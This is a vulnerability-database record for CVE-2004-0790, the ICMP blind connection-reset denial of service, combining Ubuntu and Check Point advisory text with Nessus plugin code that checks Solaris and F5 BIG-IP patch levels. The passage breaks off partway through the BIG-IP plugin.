{"ubuntucve": [{"lastseen": "2021-11-22T22:04:30", "description": "Multiple TCP/IP and ICMP implementations allow remote attackers to cause a\ndenial of service (reset TCP connections) via spoofed ICMP error messages,\naka the \"blind connection-reset attack.\" NOTE: CVE-2004-0790,\nCVE-2004-0791, and CVE-2004-1060 have been SPLIT based on different\nattacks; CVE-2005-0065, CVE-2005-0066, CVE-2005-0067, and CVE-2005-0068 are\nrelated identifiers that are SPLIT based on the underlying vulnerability.\nWhile CVE normally SPLITs based on vulnerability, the attack-based\nidentifiers exist due to the variety and number of affected implementations\nand solutions that address the attacks instead of the underlying\nvulnerabilities.", "cvss3": {}, "published": "2005-04-12T00:00:00", "type": "ubuntucve", "title": "CVE-2004-0790", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2004-0790"], "modified": "2005-04-12T00:00:00", "id": "UB:CVE-2004-0790", "href": "https://ubuntu.com/security/CVE-2004-0790", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}], "checkpoint_advisories": [{"lastseen": "2021-12-17T12:15:24", "description": "There exists a vulnerability in multiple vendor's TCP/IP and Internet Control Message Protocol (ICMP) implementations. A spoofed ICMP message containing crafted fields can force the vulnerable system to reset TCP connection. A remote attacker can exploit this vulnerability to interrupt services or degrade the network performance of the target system. 
In order for an attack to be executed there must exist an open TCP connection between a pair of hosts. The attacker then has the option of attacking either one of the two connected hosts. The resulting behavior needs to be explored from both sides of the connection.", "cvss3": {}, "published": "2013-04-30T00:00:00", "type": "checkpoint_advisories", "title": "Multiple Vendor ICMP Connection Reset Denial of Service - High Confidence (CVE-2004-0790)", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2004-0790"], "modified": "2014-07-29T00:00:00", "id": "CPAI-2013-1688", "href": "", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2021-11-04T20:09:18", "description": "The Internet Control Message Protocol (ICMP) is part of the Internet Protocol suite. ICMP facilitates error, control, and informational message exchange between network devices. For instance, ICMP may be used to test network connectivity between two hosts. There exists a vulnerability in multiple vendor's TCP/IP and Internet Control Message Protocol (ICMP) implementations. A spoofed ICMP message containing crafted fields can force the vulnerable system to reset TCP connection. A remote attacker can exploit this vulnerability to interrupt services or degrade the network performance of the target system. In order for an attack to be executed there must exist an open TCP connection between a pair of hosts. The attacker then has the option of attacking either one of the two connected hosts. 
The resulting behavior needs to be explored from both sides of the connection. Upon receiving the malicious packet from the attacker the vulnerable host will terminate the TCP connection, thereby destroying the socket used to maintain the connection. No announcement will be sent to the other host, the connected host. Therefore the connected host will remain unaware that the connection has been terminated. If the connected host was in the listening mode at the time of the attack it may remain in this mode indefinitely. Alternatively, if it tries to communicate with the vulnerable host, it will receive a TCP RST, since the vulnerable host has already closed the connection and destroyed the socket. Note: Systems using Sun Solaris will not abort an established connection upon receiving the spoofed ICMP error messages. The vendor reports that only a connection in a pre-established state can be interrupted and reset.", "cvss3": {}, "published": "2010-02-28T00:00:00", "type": "checkpoint_advisories", "title": "Multiple Vendor ICMP Connection Reset Denial of Service (CVE-2004-0790)", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2004-0790"], "modified": "2013-04-30T00:00:00", "id": "CPAI-2005-356", "href": "", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}], "nessus": [{"lastseen": "2021-08-19T13:20:05", "description": "SunOS 5.7: Kernel Update Patch.\nDate this patch was last updated by Sun : Dec/06/06", "cvss3": {"score": null, "vector": null}, "published": "2004-07-12T00:00:00", "type": 
"nessus", "title": "Solaris 7 (sparc) : 106541-44", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2004-0790", "CVE-2004-0791"], "modified": "2011-10-24T00:00:00", "cpe": [], "id": "SOLARIS7_106541.NASL", "href": "https://www.tenable.com/plugins/nessus/13086", "sourceData": "#%NASL_MIN_LEVEL 999999\n\n# @DEPRECATED@\n#\n# This script has been deprecated as the associated patch is not\n# currently a recommended security fix.\n#\n# Disabled on 2011/10/24.\n#\n\n#\n# (C) Tenable Network Security, Inc.\n#\n#\n\nif ( ! defined_func(\"bn_random\") ) exit(0);\ninclude(\"compat.inc\");\n\nif(description)\n{\n script_id(13086);\n script_version(\"1.33\");\n\n script_name(english: \"Solaris 7 (sparc) : 106541-44\");\n script_cve_id(\"CVE-2004-0790\", \"CVE-2004-0791\");\n script_set_attribute(attribute: \"synopsis\", value:\n\"The remote host is missing Sun Security Patch number 106541-44\");\n script_set_attribute(attribute: \"description\", value:\n'SunOS 5.7: Kernel Update Patch.\nDate this patch was last updated by Sun : Dec/06/06');\n script_set_attribute(attribute: \"solution\", value:\n\"You should install this patch for your system to be up-to-date.\");\n script_set_attribute(attribute: \"see_also\", value:\n\"http://download.oracle.com/sunalerts/1001318.1.html\");\n script_set_attribute(attribute: \"cvss_vector\", value: \"CVSS2#AV:N/AC:L/Au:N/C:N/I:N/A:P\");\n script_set_attribute(attribute:\"plugin_publication_date\", value: \"2004/07/12\");\n script_cvs_date(\"Date: 2018/07/20 0:18:53\");\n script_end_attributes();\n\n script_summary(english: \"Check for patch 106541-44\");\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2004-2018 Tenable Network Security, Inc.\");\n family[\"english\"] = \"Solaris Local Security Checks\";\n script_family(english:family[\"english\"]);\n \n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/Solaris/showrev\");\n exit(0);\n}\n\n# Deprecated.\nexit(0, 
\"The associated patch is not currently a recommended security fix.\");\n\n\n\n\ninclude(\"solaris.inc\");\n\ne += solaris_check_patch(release:\"5.7\", arch:\"sparc\", patch:\"106541-44\", obsoleted_by:\"\", package:\"FJSVhea\", version:\"1.0,REV=1998.11.16.20.05\");\ne += solaris_check_patch(release:\"5.7\", arch:\"sparc\", patch:\"106541-44\", obsoleted_by:\"\", package:\"SUNWarc\", version:\"11.7.0,REV=1998.09.01.04.16\");\ne += solaris_check_patch(release:\"5.7\", arch:\"sparc\", patch:\"106541-44\", obsoleted_by:\"\", package:\"SUNWarcx\", version:\"11.7.0,REV=1998.09.01.04.16\");\ne += solaris_check_patch(release:\"5.7\", arch:\"sparc\", patch:\"106541-44\", obsoleted_by:\"\", package:\"SUNWatfsr\", version:\"11.7.0,REV=1998.09.01.04.16\");\ne += solaris_check_patch(release:\"5.7\", arch:\"sparc\", patch:\"106541-44\", obsoleted_by:\"\", package:\"SUNWcar\", version:\"11.7.0,REV=1998.09.01.04.16\");\ne += solaris_check_patch(release:\"5.7\", arch:\"sparc\", patch:\"106541-44\", obsoleted_by:\"\", package:\"SUNWcar\", version:\"11.7.0,REV=1999.01.11.15.30\");\ne += solaris_check_patch(release:\"5.7\", arch:\"sparc\", patch:\"106541-44\", obsoleted_by:\"\", package:\"SUNWcarx\", version:\"11.7.0,REV=1998.09.01.04.16\");\ne += solaris_check_patch(release:\"5.7\", arch:\"sparc\", patch:\"106541-44\", obsoleted_by:\"\", package:\"SUNWcarx\", version:\"11.7.0,REV=1998.11.30.15.02\");\ne += solaris_check_patch(release:\"5.7\", arch:\"sparc\", patch:\"106541-44\", obsoleted_by:\"\", package:\"SUNWcpr\", version:\"11.7.0,REV=1998.09.01.04.16\");\ne += solaris_check_patch(release:\"5.7\", arch:\"sparc\", patch:\"106541-44\", obsoleted_by:\"\", package:\"SUNWcpr\", version:\"11.7.0,REV=1998.11.16.20.05\");\ne += solaris_check_patch(release:\"5.7\", arch:\"sparc\", patch:\"106541-44\", obsoleted_by:\"\", package:\"SUNWcprx\", version:\"11.7.0,REV=1998.09.01.04.16\");\ne += solaris_check_patch(release:\"5.7\", arch:\"sparc\", patch:\"106541-44\", obsoleted_by:\"\", 
package:\"SUNWcprx\", version:\"11.7.0,REV=1998.11.16.20.05\");\ne += solaris_check_patch(release:\"5.7\", arch:\"sparc\", patch:\"106541-44\", obsoleted_by:\"\", package:\"SUNWcsl\", version:\"11.7.0,REV=1998.09.01.04.16\");\ne += solaris_check_patch(release:\"5.7\", arch:\"sparc\", patch:\"106541-44\", obsoleted_by:\"\", package:\"SUNWcslx\", version:\"11.7.0,REV=1998.09.01.04.16\");\ne += solaris_check_patch(release:\"5.7\", arch:\"sparc\", patch:\"106541-44\", obsoleted_by:\"\", package:\"SUNWcsr\", version:\"11.7.0,REV=1998.09.01.04.16\");\ne += solaris_check_patch(release:\"5.7\", arch:\"sparc\", patch:\"106541-44\", obsoleted_by:\"\", package:\"SUNWcsu\", version:\"11.7.0,REV=1998.10.06.00.59\");\ne += solaris_check_patch(release:\"5.7\", arch:\"sparc\", patch:\"106541-44\", obsoleted_by:\"\", package:\"SUNWcsxu\", version:\"11.7.0,REV=1998.09.01.04.16\");\ne += solaris_check_patch(release:\"5.7\", arch:\"sparc\", patch:\"106541-44\", obsoleted_by:\"\", package:\"SUNWcvc\", version:\"11.7.0,REV=1998.09.01.04.16\");\ne += solaris_check_patch(release:\"5.7\", arch:\"sparc\", patch:\"106541-44\", obsoleted_by:\"\", package:\"SUNWcvcx\", version:\"11.7.0,REV=1998.09.01.04.16\");\ne += solaris_check_patch(release:\"5.7\", arch:\"sparc\", patch:\"106541-44\", obsoleted_by:\"\", package:\"SUNWdpl\", version:\"11.7.0,REV=1998.09.01.04.16\");\ne += solaris_check_patch(release:\"5.7\", arch:\"sparc\", patch:\"106541-44\", obsoleted_by:\"\", package:\"SUNWdplx\", version:\"11.7.0,REV=1998.09.01.04.16\");\ne += solaris_check_patch(release:\"5.7\", arch:\"sparc\", patch:\"106541-44\", obsoleted_by:\"\", package:\"SUNWdrr\", version:\"11.7.0,REV=1999.03.09.04.51\");\ne += solaris_check_patch(release:\"5.7\", arch:\"sparc\", patch:\"106541-44\", obsoleted_by:\"\", package:\"SUNWdrrx\", version:\"11.7.0,REV=1999.03.09.04.51\");\ne += solaris_check_patch(release:\"5.7\", arch:\"sparc\", patch:\"106541-44\", obsoleted_by:\"\", package:\"SUNWesu\", 
version:\"11.7.0,REV=1998.09.01.04.16\");\ne += solaris_check_patch(release:\"5.7\", arch:\"sparc\", patch:\"106541-44\", obsoleted_by:\"\", package:\"SUNWesxu\", version:\"11.7.0,REV=1998.09.01.04.16\");\ne += solaris_check_patch(release:\"5.7\", arch:\"sparc\", patch:\"106541-44\", obsoleted_by:\"\", package:\"SUNWhea\", version:\"11.7.0,REV=1998.09.01.04.16\");\ne += solaris_check_patch(release:\"5.7\", arch:\"sparc\", patch:\"106541-44\", obsoleted_by:\"\", package:\"SUNWipc\", version:\"11.7.0,REV=1998.09.01.04.16\");\ne += solaris_check_patch(release:\"5.7\", arch:\"sparc\", patch:\"106541-44\", obsoleted_by:\"\", package:\"SUNWkvm\", version:\"11.7.0,REV=1998.09.01.04.16\");\ne += solaris_check_patch(release:\"5.7\", arch:\"sparc\", patch:\"106541-44\", obsoleted_by:\"\", package:\"SUNWkvm\", version:\"11.7.0,REV=1999.01.11.15.30\");\ne += solaris_check_patch(release:\"5.7\", arch:\"sparc\", patch:\"106541-44\", obsoleted_by:\"\", package:\"SUNWkvmx\", version:\"11.7.0,REV=1998.09.01.04.16\");\ne += solaris_check_patch(release:\"5.7\", arch:\"sparc\", patch:\"106541-44\", obsoleted_by:\"\", package:\"SUNWkvmx\", version:\"11.7.0,REV=1998.11.16.20.05\");\ne += solaris_check_patch(release:\"5.7\", arch:\"sparc\", patch:\"106541-44\", obsoleted_by:\"\", package:\"SUNWnisu\", version:\"11.7.0,REV=1998.09.01.04.16\");\ne += solaris_check_patch(release:\"5.7\", arch:\"sparc\", patch:\"106541-44\", obsoleted_by:\"\", package:\"SUNWpcmci\", version:\"11.7.0,REV=1998.09.01.04.16\");\ne += solaris_check_patch(release:\"5.7\", arch:\"sparc\", patch:\"106541-44\", obsoleted_by:\"\", package:\"SUNWpcmcu\", version:\"11.7.0,REV=1998.09.01.04.16\");\ne += solaris_check_patch(release:\"5.7\", arch:\"sparc\", patch:\"106541-44\", obsoleted_by:\"\", package:\"SUNWpcmcx\", version:\"11.7.0,REV=1998.09.01.04.16\");\ne += solaris_check_patch(release:\"5.7\", arch:\"sparc\", patch:\"106541-44\", obsoleted_by:\"\", package:\"SUNWscpu\", version:\"11.7.0,REV=1998.09.01.04.16\");\ne 
+= solaris_check_patch(release:\"5.7\", arch:\"sparc\", patch:\"106541-44\", obsoleted_by:\"\", package:\"SUNWscpux\", version:\"11.7.0,REV=1998.09.01.04.16\");\ne += solaris_check_patch(release:\"5.7\", arch:\"sparc\", patch:\"106541-44\", obsoleted_by:\"\", package:\"SUNWssad\", version:\"11.7.0,REV=1998.09.01.04.16\");\ne += solaris_check_patch(release:\"5.7\", arch:\"sparc\", patch:\"106541-44\", obsoleted_by:\"\", package:\"SUNWssadx\", version:\"11.7.0,REV=1998.09.01.04.16\");\ne += solaris_check_patch(release:\"5.7\", arch:\"sparc\", patch:\"106541-44\", obsoleted_by:\"\", package:\"SUNWsxr\", version:\"11.7.0,REV=1998.09.01.04.16\");\ne += solaris_check_patch(release:\"5.7\", arch:\"sparc\", patch:\"106541-44\", obsoleted_by:\"\", package:\"SUNWtnfc\", version:\"11.7.0,REV=1998.09.01.04.16\");\ne += solaris_check_patch(release:\"5.7\", arch:\"sparc\", patch:\"106541-44\", obsoleted_by:\"\", package:\"SUNWtnfcx\", version:\"11.7.0,REV=1998.09.01.04.16\");\ne += solaris_check_patch(release:\"5.7\", arch:\"sparc\", patch:\"106541-44\", obsoleted_by:\"\", package:\"SUNWtoo\", version:\"11.7.0,REV=1998.09.01.04.16\");\ne += solaris_check_patch(release:\"5.7\", arch:\"sparc\", patch:\"106541-44\", obsoleted_by:\"\", package:\"SUNWtoox\", version:\"11.7.0,REV=1998.09.01.04.16\");\ne += solaris_check_patch(release:\"5.7\", arch:\"sparc\", patch:\"106541-44\", obsoleted_by:\"\", package:\"SUNWvolr\", version:\"11.7.0,REV=1998.09.01.04.16\");\ne += solaris_check_patch(release:\"5.7\", arch:\"sparc\", patch:\"106541-44\", obsoleted_by:\"\", package:\"SUNWvolu\", version:\"11.7.0,REV=1998.09.01.04.16\");\ne += solaris_check_patch(release:\"5.7\", arch:\"sparc\", patch:\"106541-44\", obsoleted_by:\"\", package:\"SUNWypu\", version:\"11.7.0,REV=1998.09.01.04.16\");\nif ( e < 0 ) { \n\tif ( NASL_LEVEL < 3000 ) \n\t security_warning(0);\n\telse \n\t security_warning(port:0, extra:solaris_get_report());\n\texit(0); \n} \nexit(0, \"Host is not affected\");\n", "cvss": 
{"score": 5, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2021-08-19T13:20:06", "description": "SunOS 5.7_x86: Kernel Update Patch.\nDate this patch was last updated by Sun : Nov/27/06", "cvss3": {"score": null, "vector": null}, "published": "2004-07-12T00:00:00", "type": "nessus", "title": "Solaris 7 (x86) : 106542-43", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2004-0790", "CVE-2004-0791"], "modified": "2011-10-24T00:00:00", "cpe": [], "id": "SOLARIS7_X86_106542.NASL", "href": "https://www.tenable.com/plugins/nessus/13193", "sourceData": "#%NASL_MIN_LEVEL 999999\n\n# @DEPRECATED@\n#\n# This script has been deprecated as the associated patch is not\n# currently a recommended security fix.\n#\n# Disabled on 2011/10/24.\n#\n\n#\n# (C) Tenable Network Security, Inc.\n#\n#\n\nif ( ! defined_func(\"bn_random\") ) exit(0);\ninclude(\"compat.inc\");\n\nif(description)\n{\n script_id(13193);\n script_version(\"1.29\");\n\n script_name(english: \"Solaris 7 (x86) : 106542-43\");\n script_cve_id(\"CVE-2004-0790\", \"CVE-2004-0791\");\n script_set_attribute(attribute: \"synopsis\", value:\n\"The remote host is missing Sun Security Patch number 106542-43\");\n script_set_attribute(attribute: \"description\", value:\n'SunOS 5.7_x86: Kernel Update Patch.\nDate this patch was last updated by Sun : Nov/27/06');\n script_set_attribute(attribute: \"solution\", value:\n\"You should install this patch for your system to be up-to-date.\");\n script_set_attribute(attribute: \"see_also\", value:\n\"http://download.oracle.com/sunalerts/1001318.1.html\");\n script_set_attribute(attribute: \"cvss_vector\", value: \"CVSS2#AV:N/AC:L/Au:N/C:N/I:N/A:P\");\n script_set_attribute(attribute:\"plugin_publication_date\", value: \"2004/07/12\");\n script_cvs_date(\"Date: 2018/07/20 0:18:53\");\n script_end_attributes();\n\n script_summary(english: \"Check for patch 106542-43\");\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 
2004-2018 Tenable Network Security, Inc.\");\n family[\"english\"] = \"Solaris Local Security Checks\";\n script_family(english:family[\"english\"]);\n \n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/Solaris/showrev\");\n exit(0);\n}\n\n# Deprecated.\nexit(0, \"The associated patch is not currently a recommended security fix.\");\n\n\n\n\ninclude(\"solaris.inc\");\n\ne += solaris_check_patch(release:\"5.7_x86\", arch:\"i386\", patch:\"106542-43\", obsoleted_by:\"\", package:\"SUNWarc\", version:\"11.7.0,REV=1998.09.01.04.53\");\ne += solaris_check_patch(release:\"5.7_x86\", arch:\"i386\", patch:\"106542-43\", obsoleted_by:\"\", package:\"SUNWatfsr\", version:\"11.7.0,REV=1998.09.01.04.53\");\ne += solaris_check_patch(release:\"5.7_x86\", arch:\"i386\", patch:\"106542-43\", obsoleted_by:\"\", package:\"SUNWcar\", version:\"11.7.0,REV=1998.09.01.04.53\");\ne += solaris_check_patch(release:\"5.7_x86\", arch:\"i386\", patch:\"106542-43\", obsoleted_by:\"\", package:\"SUNWcsl\", version:\"11.7.0,REV=1998.09.01.04.53\");\ne += solaris_check_patch(release:\"5.7_x86\", arch:\"i386\", patch:\"106542-43\", obsoleted_by:\"\", package:\"SUNWcsr\", version:\"11.7.0,REV=1998.09.01.04.53\");\ne += solaris_check_patch(release:\"5.7_x86\", arch:\"i386\", patch:\"106542-43\", obsoleted_by:\"\", package:\"SUNWcsu\", version:\"11.7.0,REV=1998.10.06.01.22\");\ne += solaris_check_patch(release:\"5.7_x86\", arch:\"i386\", patch:\"106542-43\", obsoleted_by:\"\", package:\"SUNWdpl\", version:\"11.7.0,REV=1998.09.01.04.53\");\ne += solaris_check_patch(release:\"5.7_x86\", arch:\"i386\", patch:\"106542-43\", obsoleted_by:\"\", package:\"SUNWesu\", version:\"11.7.0,REV=1998.09.01.04.53\");\ne += solaris_check_patch(release:\"5.7_x86\", arch:\"i386\", patch:\"106542-43\", obsoleted_by:\"\", package:\"SUNWhea\", version:\"11.7.0,REV=1998.09.01.04.53\");\ne += solaris_check_patch(release:\"5.7_x86\", arch:\"i386\", patch:\"106542-43\", obsoleted_by:\"\", 
package:\"SUNWipc\", version:\"11.7.0,REV=1998.09.01.04.53\");\ne += solaris_check_patch(release:\"5.7_x86\", arch:\"i386\", patch:\"106542-43\", obsoleted_by:\"\", package:\"SUNWkvm\", version:\"11.7.0,REV=1998.09.01.04.53\");\ne += solaris_check_patch(release:\"5.7_x86\", arch:\"i386\", patch:\"106542-43\", obsoleted_by:\"\", package:\"SUNWnisu\", version:\"11.7.0,REV=1998.09.01.04.53\");\ne += solaris_check_patch(release:\"5.7_x86\", arch:\"i386\", patch:\"106542-43\", obsoleted_by:\"\", package:\"SUNWpcmci\", version:\"11.7.0,REV=1998.09.01.04.53\");\ne += solaris_check_patch(release:\"5.7_x86\", arch:\"i386\", patch:\"106542-43\", obsoleted_by:\"\", package:\"SUNWpcmcu\", version:\"11.7.0,REV=1998.09.01.04.53\");\ne += solaris_check_patch(release:\"5.7_x86\", arch:\"i386\", patch:\"106542-43\", obsoleted_by:\"\", package:\"SUNWscpu\", version:\"11.7.0,REV=1998.09.01.04.53\");\ne += solaris_check_patch(release:\"5.7_x86\", arch:\"i386\", patch:\"106542-43\", obsoleted_by:\"\", package:\"SUNWtnfc\", version:\"11.7.0,REV=1998.09.01.04.53\");\ne += solaris_check_patch(release:\"5.7_x86\", arch:\"i386\", patch:\"106542-43\", obsoleted_by:\"\", package:\"SUNWtoo\", version:\"11.7.0,REV=1998.09.01.04.53\");\ne += solaris_check_patch(release:\"5.7_x86\", arch:\"i386\", patch:\"106542-43\", obsoleted_by:\"\", package:\"SUNWvolr\", version:\"11.7.0,REV=1998.09.01.04.53\");\ne += solaris_check_patch(release:\"5.7_x86\", arch:\"i386\", patch:\"106542-43\", obsoleted_by:\"\", package:\"SUNWvolu\", version:\"11.7.0,REV=1998.09.01.04.53\");\ne += solaris_check_patch(release:\"5.7_x86\", arch:\"i386\", patch:\"106542-43\", obsoleted_by:\"\", package:\"SUNWypu\", version:\"11.7.0,REV=1998.09.01.04.53\");\nif ( e < 0 ) { \n\tif ( NASL_LEVEL < 3000 ) \n\t security_warning(0);\n\telse \n\t security_warning(port:0, extra:solaris_get_report());\n\texit(0); \n} \nexit(0, \"Host is not affected\");\n", "cvss": {"score": 5, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}, {"lastseen": 
"2021-08-19T12:44:26", "description": "The remote BIG-IP device is missing a patch required by a security advisory.", "cvss3": {"score": null, "vector": null}, "published": "2015-09-18T00:00:00", "type": "nessus", "title": "F5 Networks BIG-IP : Insufficient validation of ICMP error messages (SOL4583)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2004-0790", "CVE-2004-0791"], "modified": "2021-01-11T00:00:00", "cpe": ["cpe:/a:f5:big-ip_access_policy_manager", "cpe:/a:f5:big-ip_application_security_manager", "cpe:/a:f5:big-ip_link_controller", "cpe:/a:f5:big-ip_local_traffic_manager", "cpe:/a:f5:big-ip_wan_optimization_manager", "cpe:/a:f5:big-ip_webaccelerator", "cpe:/h:f5:big-ip", "cpe:/h:f5:big-ip_protocol_security_manager"], "id": "F5_BIGIP_SOL4583.NASL", "href": "https://www.tenable.com/plugins/nessus/86016", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from F5 Networks BIG-IP Solution SOL4583.\n#\n# The text description of this plugin is (C) F5 Networks.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(86016);\n script_version(\"2.9\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/11\");\n\n script_cve_id(\"CVE-2004-0790\", \"CVE-2004-0791\");\n script_bugtraq_id(13124);\n\n script_name(english:\"F5 Networks BIG-IP : Insufficient validation of ICMP error messages (SOL4583)\");\n script_summary(english:\"Checks the BIG-IP version.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote device is missing a vendor-supplied security patch.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"The remote BIG-IP device is missing a patch required by a security\nadvisory.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://support.f5.com/csp/article/K4583\"\n );\n script_set_attribute(\n 
attribute:\"solution\", \n value:\n\"Upgrade to one of the non-vulnerable versions listed in the F5\nSolution SOL4583.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:N/I:N/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"potential_vulnerability\", value:\"true\");\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:f5:big-ip_access_policy_manager\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:f5:big-ip_application_security_manager\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:f5:big-ip_link_controller\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:f5:big-ip_local_traffic_manager\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:f5:big-ip_wan_optimization_manager\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:f5:big-ip_webaccelerator\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/h:f5:big-ip\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/h:f5:big-ip_protocol_security_manager\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2007/05/16\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2015/09/18\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2015-2021 and is owned by Tenable, Inc. 
or an Affiliate thereof.\");\n script_family(english:\"F5 Networks Local Security Checks\");\n\n script_dependencies(\"f5_bigip_detect.nbin\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/BIG-IP/hotfix\", \"Host/BIG-IP/modules\", \"Host/BIG-IP/version\", \"Settings/ParanoidReport\");\n\n exit(0);\n}\n\n\ninclude(\"f5_func.inc\");\n\nif ( ! get_kb_item(\"Host/local_checks_enabled\") ) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nversion = get_kb_item(\"Host/BIG-IP/version\");\nif ( ! version ) audit(AUDIT_OS_NOT, \"F5 Networks BIG-IP\");\nif ( isnull(get_kb_item(\"Host/BIG-IP/hotfix\")) ) audit(AUDIT_KB_MISSING, \"Host/BIG-IP/hotfix\");\nif ( ! get_kb_item(\"Host/BIG-IP/modules\") ) audit(AUDIT_KB_MISSING, \"Host/BIG-IP/modules\");\n\nsol = \"SOL4583\";\nvmatrix = make_array();\n\nif (report_paranoia < 2) audit(AUDIT_PARANOID);\n\n# APM\nvmatrix[\"APM\"] = make_array();\nvmatrix[\"APM\"][\"affected\" ] = make_list(\"10.1.0-10.2.2\");\nvmatrix[\"APM\"][\"unaffected\"] = make_list(\"10.2.2HF2\",\"10.2.3-10.2.4\",\"11\");\n\n# ASM\nvmatrix[\"ASM\"] = make_array();\nvmatrix[\"ASM\"][\"affected\" ] = make_list(\"9.2.0-9.2.5\",\"9.4.0-9.4.8\",\"10.0.0-10.2.2\");\nvmatrix[\"ASM\"][\"unaffected\"] = make_list(\"9.3\",\"10.2.2HF2\",\"10.2.3-10.2.4\",\"11\");\n\n# LC\nvmatrix[\"LC\"] = make_array();\nvmatrix[\"LC\"][\"affected\" ] = make_list(\"9.2.2-9.2.5\",\"9.4.0-9.4.8\",\"10.0.0-10.2.2\");\nvmatrix[\"LC\"][\"unaffected\"] = make_list(\"9.3\",\"10.2.2HF2\",\"10.2.3-10.2.4\",\"11\");\n\n# LTM\nvmatrix[\"LTM\"] = make_array();\nvmatrix[\"LTM\"][\"affected\" ] = make_list(\"9.0.0-9.0.5\",\"9.1.0-9.1.3\",\"9.2.0-9.2.5\",\"9.4.0-9.4.8\",\"9.6.0-9.6.1\",\"10.0.0-10.2.2\");\nvmatrix[\"LTM\"][\"unaffected\"] = make_list(\"9.3\",\"10.2.2HF2\",\"10.2.3-10.2.4\",\"11\");\n\n# PSM\nvmatrix[\"PSM\"] = make_array();\nvmatrix[\"PSM\"][\"affected\" ] = make_list(\"9.4.5-9.4.8\",\"10.0.0-10.2.2\");\nvmatrix[\"PSM\"][\"unaffected\"] = 
